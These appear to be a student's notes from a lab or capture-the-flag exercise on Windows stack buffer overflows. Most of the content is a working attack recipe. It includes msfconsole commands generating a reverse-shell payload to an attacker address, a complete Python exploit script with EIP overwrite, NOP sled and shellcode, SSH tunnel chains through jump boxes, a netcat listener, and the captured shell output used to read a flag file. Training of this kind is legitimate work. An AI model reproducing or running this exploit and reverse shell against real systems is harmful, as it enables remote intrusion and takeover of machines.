					WINDOWS PAYLOAD CRAFTING ____________________________________________________________________________________________________________________


locate files and move to operational box

Build script by pieces: 

downloads files and move them to host where it needs to be analyzed. 

Open to terminals and run: Netstat -a on one and then run the program and open a second terminal after launch 
then run netstat -a again. Compared the listening devise and find the new listening port number. 

Thenerify run NC from your box to the target box using NC <IP> <PORT>

visit this to create your pattern generator https://wiremask.eu/tools/buffer-overflow-pattern-generator

make it well over 200 copy the pattern and input into the script to run and generate the output in the Immunity to get the EIP = once that's done copy the EIP and enter to the site to generate your overflow for|


Building script:

Student@lin-ops$ msfconsole

msf6 > use windows/shell_reverse_tcp
msf6 payloads(windows/shell_reverse_tcp) > 
msf6 payloads(windows/shell_reverse_tcp) > set LHOST 10.50.180.197
msf6 payloads(windows/shell_reverse_tcp) > set LPORT 3535
msf6 payloads(windows/shell_reverse_tcp) > generate -b "\x00" -f python 

-------------------------------------------------------------------------------------------------------------------

example of completed script:

#!/usr/bin/python
import socket
command = "BUFF /.:/"
BUFF = 'A' * 1945		#  <----------------------------------------------------------------------
EIP ="\x31\x14\x50\x62"
'''
0x62501431 
0x6250143E	# to get this information we need to run this command inside of the Immunity.
0x6250144B	# !mona jmp -r esp -m "file.dll"  and select the first 3 or 4 outputs.
'''

NOP = "\x90" * 10

buf =  b""
buf += b"\xd9\xcb\xbb\xd8\xdc\xe8\xd0\xd9\x74\x24\xf4\x5e"
buf += b"\x29\xc9\xb1\x52\x83\xc6\x04\x31\x5e\x13\x03\x86"
buf += b"\xcf\x0a\x25\xca\x18\x48\xc6\x32\xd9\x2d\x4e\xd7"
buf += b"\xe8\x6d\x34\x9c\x5b\x5e\x3e\xf0\x57\x15\x12\xe0"
buf += b"\xec\x5b\xbb\x07\x44\xd1\x9d\x26\x55\x4a\xdd\x29" #This is example of the output of payload creation 
buf += b"\xd5\x91\x32\x89\xe4\x59\x47\xc8\x21\x87\xaa\x98"					       	 
buf += b"\xfa\xc3\x19\x0c\x8e\x9e\xa1\xa7\xdc\x0f\xa2\x54"					        
buf += b"\x94\x2e\x83\xcb\xae\x68\x03\xea\x63\x01\x0a\xf4"						

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.50.180.198", 1787))  #Here we place the targeted host and discovered port from the netstat scan. 
print s.recv(1024)
s.send(command + BUFF +  EIP + NOP + buf)
print s.recv(1024)
s.close()

-------------------------------------------------------------------------------------------------------------------
Tunnels created in order to get to my host: 

				Host			Jump Box
- student@lin-ops:~$ ssh student@10.50.11.118 -L 1111:192.168.28.111:2222

- student@lin-ops:~$ ssh -p 1111 comrade@localhost -L 3333:192.168.28.105:2222

- student@lin-ops:~$ ssh -p 3333 comrade@localhost -D 9050lin.intranet.donovia

-------------------------------------------------------------------------------------------------------------------

Next Step: open new terminal and activate listening port before running script using the port you established during the metasploit payload configuration>  nc -lvnp 5555

Next Step: Go back into your main workbox Run your script and confirm connection to designated host as the example below. The begin searching for your file/Flag.


:\windows\system32>cd C:\users\public
cd C:\users\public

C:\Users\Public>dir
dir
 Volume in drive C is OS
 Volume Serial Number is 00E6-9C0D

 Directory of C:\Users\Public

01/03/2019  11:36 PM    <DIR>          .
01/03/2019  11:36 PM    <DIR>          ..
11/01/2021  03:37 PM    <DIR>          Documents
04/11/2018  11:38 PM    <DIR>          Downloads
04/11/2018  11:38 PM    <DIR>          Music
04/11/2018  11:38 PM    <DIR>          Pictures
04/11/2018  11:38 PM    <DIR>          Videos
               0 File(s)              0 bytes
               7 Dir(s)  21,116,678,144 bytes free

C:\Users\Public>cd Documents    
cd Documents

C:\Users\Public\Documents>dir
dir
 Volume in drive C is OS
 Volume Serial Number is 00E6-9C0D

 Directory of C:\Users\Public\Documents

11/01/2021  03:37 PM    <DIR>          .
11/01/2021  03:37 PM    <DIR>          ..
09/26/2025  06:46 PM                25 Flag.txt
               1 File(s)             25 bytes
               2 Dir(s)  21,116,678,144 bytes free

C:\Users\Public\Documents>type Flag.txt
type Flag.txt
E3gznHp6dEHCjh7cdrJE

